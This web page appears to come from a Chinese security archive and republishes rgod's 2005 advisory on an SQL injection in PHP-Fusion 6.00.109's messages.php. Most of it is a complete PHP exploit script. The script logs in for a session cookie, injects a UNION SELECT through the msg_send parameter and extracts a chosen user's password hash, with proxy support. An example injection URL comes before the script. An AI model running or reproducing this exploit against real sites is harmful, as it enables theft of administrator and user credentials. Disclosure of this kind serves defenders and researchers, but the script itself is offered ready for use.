首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP-Fusion msg_send SQL Injection
来源:retrogod@aliceposta.it 作者:rgod 发布时间:2005-09-30  

PHP-Fusion msg_send SQL Injection

Summary
PHP-Fusion - "A light-weight open-source content management system (CMS) written in PHP. It utilizes a MySQL database to store your site content and includes a simple, comprehensive administration system."

An SQL Injection vulnerability has been discovered in PHP-Fusion's messages.php script.

Credit:
The information has been provided by rgod.

Details
Vulnerable Systems:
* PHP-Fusion version 6.00.109

If magic_quotes set to off, PHP-Fusion vulnerable to SQL Injection.

Example:
http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/*

Now hash will be showed in "To:" field when you post a private message.

Exploit:
<?php
# 19.17 28/09/2005 #
# #
# -- PhpF6_00_109xpl.php #
# #
# PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# mphhh, private messages again...tze,tze #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# go! #
# #
# Sun-Tzu: "Therefore the clever combatant imposes his will on the enemy, #
# but does not allow the enemy's will to be imposed on him" #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title> *** PHP-Fusion v6.00.109 SQL Injection *** </title> <meta
http-equiv= "Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"><!-- body,td,th {color:#00FF00;} body{background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold;
font-style: italic; } --> </style></head><body> <p class="Stile6"> Php-Fusion v6.
00.109 SQL Injection / admin|user credentials disclosure </p><p class="Stile6">
a script by rgod at <a href="http://rgod.altervista.org" target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=value
&port=value&proxy=value&user=value&pass=value&username=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname ( ex: www.sitename.com )
</span></p> <p> <input type="text" name="path"><span class="Stile5"> path (ex:
/phpfusion/ or just /)</span></p><p> <input type="text" name="port"> <span
class="Stile5">specify a port other than 80 (default value)</span></p><p> <input
type="text" name="user"> <span class="Stile5">your username </span> </p> <p>
<input type="text" name="pass"> <span class="Stile5">your password ( to get a
valid session cookie) </span></p><p><input type="text" name="username"> <span
class="Stile5">user whom you want the password </span></p><p><input type="text"
name="proxy"> <span class="Stile5"> send exploit trough an HTTP proxy </span>
</p> <p> <input type="submit"name="Submit" value="go!"> </p></form> </td> </tr>
</table></body></html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td> </td>";
}

for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket()
{
global $proxy, $host, $port, $html, $packet;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,2048);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}


if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and ($username<>''))
{
if ($port=='') {$port=80;}

#STEP 1 -> login, to retrieve a session cookie...

$data="user_name=".urlencode(trim($user)). "&user_pass=".urlencode(trim($pass))."&login=Login";
if ($proxy=='')
{$packet="POST ".$path."news.php HTTP/1.1\r\n";}
else
{$packet="POST http://".$host.$path."news.php HTTP/1.1\r\n";}

$packet="Referer: http://".$host.$path."/news.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0];
echo '<br>Your cookie: '.htmlentities($cookie);

# STEP 2 -> SQL Injection, now retrieve the MD5 password hash from database
$username=str_replace("'","",$username);
$sql="' UNION SELECT user_password FROM fusion_users WHERE user_name='".trim($username)."'/*";

if ($proxy=='')
{$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";}
else
{$packet="GET http://".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";}

$packet.="User-Agent: GameBoy, Powered by Nintendo\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Cookie2: \$Version=1\r\n";
$packet.="Connection: Keep-Alive, TE\r\n";
$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n";
show($packet);
sendpacket($packet);
if (eregi('For Members only',$html)) {echo 'You have to specify a valid session cookie...'; die; }
$temp=explode("'Click to view the senders profile'>",$html);
$temp2=explode("</a>",$temp[1]);
$hash=$temp2[0];
echo '<br>Username: '.htmlentities($username).' Password hash: '.$hash;

}
else
{ echo '<br> Fill requested fields, optionally specify a proxy...';}

?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BlenderPlayer Local Buffer Ove
·ProZilla ftpsearch Results Han
·Barracuda Spam Firewall img.pl
·Microsoft Windows Wireless Zer
·Qpopper Poppassd Local Root
·Virtools Web PlayerMultiple Vu
·HP LaserJet Network Username a
·phpMyAdmin grab_globals.lib.ph
·Mozilla Browsers Remote Heap B
·xine-lib CDDB Client Metadata
·Gadu-Gadu Invisible Users Dete
·Computer Associates iGateway d
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved